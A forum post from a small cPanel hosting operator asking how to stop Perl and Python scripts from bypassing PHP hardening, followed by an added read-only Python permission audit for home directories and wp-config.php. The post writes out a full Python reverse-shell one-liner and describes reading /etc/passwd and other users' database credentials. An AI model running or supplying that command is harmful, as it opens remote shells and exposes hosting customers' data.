What I discovered is SHOCKING. Not really shocking to me because I kinda already knew it was possible.
So here's what's happening... I am no longer... how can I say, a 'guy with big hosting company' like before. You know, I had 2000 clients and really had money to pay for CloudLinux, KernelCare and all that extra software... before some guy screwed me over and did not pay me a single cent for my hosting company, which I 'sold' to him.
I ran a new one and my income is not great; I maybe have 1-3 clients monthly. I am using the server for my personal sites too, so it's okay to me.
So I do not have money to pay for CloudLinux and all that great additional software I could afford before; I can only pay for a dedicated server + cPanel license.
So here is what is happening. I knew cPanel on its own is not well secured, so I did everything I could to secure it.
Enabling suPHP, open_basedir protection, mod_security and 1001 more things...
Unfortunately there is one way any site can be hacked, and it's all because of Perl and Python.
Even though PHP is well protected, preventing backconnect, access to /etc/passwd and many more security measures... If you upload a cgi-telnet Perl script to any hosting account, then you execute this command
Code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("some ip",some port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
You can easily establish a shell session, and easily read the /etc/passwd file through Python...
Now that the hacker knows all cPanel usernames, he can easily do this
cd /home/username/public_html
And he can read the wp-config.php file without a problem and then mess with the database....
So guys from cPanel, is there a solution to this except buying extra software from your partners?
What about jailshell or disabled shell access? It's obviously no help to this. Or open_basedir protection.
The hacker can also read the contents of other users' public_html files using PHP if he knows the username, but he can't access /home/ or /home/user
Of course I tried setting public_html to 0750 like many years before, but something obviously changed and now that creates errors on the sites...
Dear fellow hosting providers, friends and cPanel staff, is there a solution to this?
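
An added example, not part of the original post and not cPanel's own tooling: a read-only audit for the exposure described above, reporting document roots that other local accounts can enter and wp-config.php files readable beyond their owner. The names `audit_homes` and `build_sample_tree` and the sample tree are constructed here; it assumes PHP runs as the account owner (suPHP, as the post says), so an owner-only config file stays usable by the site.

```python
import os
import stat
import tempfile

SECRET_FILES = {"wp-config.php"}  # the file the post names; extend as needed

def audit_homes(home_root, docroot="public_html"):
    """Return (path, octal mode, issue) for paths other local accounts can reach."""
    findings = []
    for user in sorted(os.listdir(home_root)):
        home = os.path.join(home_root, user)
        if os.path.islink(home) or not os.path.isdir(home):
            continue
        mode = stat.S_IMODE(os.lstat(home).st_mode)
        if mode & stat.S_IROTH:  # read bit lets others list the home directory
            findings.append((home, oct(mode), "home listable by other users"))
        root = os.path.join(home, docroot)
        if not os.path.isdir(root):
            continue
        mode = stat.S_IMODE(os.lstat(root).st_mode)
        if mode & stat.S_IRWXO:  # any "other" bit set, e.g. 0755 instead of 0750
            findings.append((root, oct(mode), "docroot open to other users"))
        for dirpath, _dirs, files in os.walk(root):
            for name in SECRET_FILES.intersection(files):
                path = os.path.join(dirpath, name)
                mode = stat.S_IMODE(os.lstat(path).st_mode)
                if mode & (stat.S_IRGRP | stat.S_IROTH):
                    findings.append((path, oct(mode), "config readable beyond owner"))
    return findings

def build_sample_tree(base):
    """Constructed sample: 'alice' uses loose modes, 'bob' uses tight ones."""
    for user, dir_mode, file_mode in (("alice", 0o755, 0o644), ("bob", 0o750, 0o600)):
        root = os.path.join(base, user, "public_html")
        os.makedirs(root)
        cfg = os.path.join(root, "wp-config.php")
        with open(cfg, "w") as fh:
            fh.write("<?php /* constructed placeholder */\n")
        os.chmod(cfg, file_mode)
        os.chmod(root, dir_mode)
        os.chmod(os.path.join(base, user), 0o711)
    return base

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for path, mode, issue in audit_homes(build_sample_tree(tmp)):
            print(f"{mode:>6}  {issue:<30} {path}")
```

On a real server, call `audit_homes("/home")` as root so every account's tree can be walked; the function only reads mode bits and changes nothing.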